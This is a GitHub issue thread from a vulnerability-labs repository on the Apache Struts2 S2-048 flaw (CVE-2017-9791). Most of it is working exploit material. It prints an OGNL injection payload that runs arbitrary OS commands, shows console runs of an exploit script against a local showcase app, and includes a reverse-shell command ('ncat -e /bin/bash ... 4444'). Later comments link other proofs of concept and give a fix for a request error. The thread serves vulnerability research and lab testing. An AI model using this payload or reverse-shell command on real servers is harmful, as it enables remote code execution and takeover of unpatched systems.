nixawk / labs

Vulnerability Labs for security analysis
1.16k stars 440 forks source link

Apache Struts2 S2-048 #8

Closed nixawk closed 7 years ago

nixawk commented 7 years ago

CVE-2017-9791

screen shot 2017-07-07 at 10 46 37 screen shot 2017-07-07 at 10 21 49

References

  1. https://cwiki.apache.org/confluence/display/WW/S2-048
  2. http://bobao.360.cn/news/detail/4219.html
  3. http://fisheye.apache.org:8060/browse/struts/apps/showcase/src/main/java/org/apache/struts2/showcase/integration/SaveGangsterAction.java?r1=59f4f31a7f3800a540c168abc67b8800db3f2f97&r2=73da12e723c2737bd515946588ddcd898acf584a
  4. https://github.com/Loneyers/vuldocker/tree/master/struts2/s2-048
nixawk commented 7 years ago

Poc Code - https://github.com/nixawk/labs/blob/master/CVE-2017-9791/exploit_S2-048.py

nixawk commented 7 years ago

Another Poc Here:


%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}


If you use the following payload, an error may be here:

root@sh:~/S2-048# python s2.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ls -l"
[*] exploit Apache Struts2 S2-048
[+] command: ls -l
Traceback (most recent call last):
  File "s2.py", line 71, in <module>
    exploit(url, cmd)
  File "s2.py", line 52, in exploit
    resp = requests.post(url, data=data, headers=headers)
  File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 110, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 641, in send
    r.content
  File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 797, in content
    self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes()
  File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 722, in generate
    raise ChunkedEncodingError(e)
requests.exceptions.ChunkedEncodingError: ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))

Poc is updated. urllib2 can handle the exception.

root@sh:~/S2-048# python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
[*] name  : exploit Apache Struts2 S2-048
[+] status: http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action - vulnerable to Apache Struts2 S2-048
[+] execmd: ncat -e /bin/bash 127.0.0.1 4444
Ncat: Connection refused.

root@sh:~/S2-048# python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "uname -a"
[*] name  : exploit Apache Struts2 S2-048
[+] status: http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action - vulnerable to Apache Struts2 S2-048
[+] execmd: uname -a
Linux sh 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux

References

  1. https://stackoverflow.com/questions/14442222/how-to-handle-incompleteread-in-python
dragoneeg commented 7 years ago

my test Poc : https://github.com/dragoneeg/Struts2-048

sasqwatch commented 7 years ago

This is another shorter payload - http://pentestit.com/apache-struts2-showcase-remote-code-execution-s2-048/

nixawk commented 7 years ago

If your poc makes an error based on requests, ex:

requests.exceptions.ChunkedEncodingError: ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))

Please try to add the following code:

import httplib

httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'

References

  1. https://github.com/nixawk/labs/blob/master/CVE-2017-5638/exploit-requests.py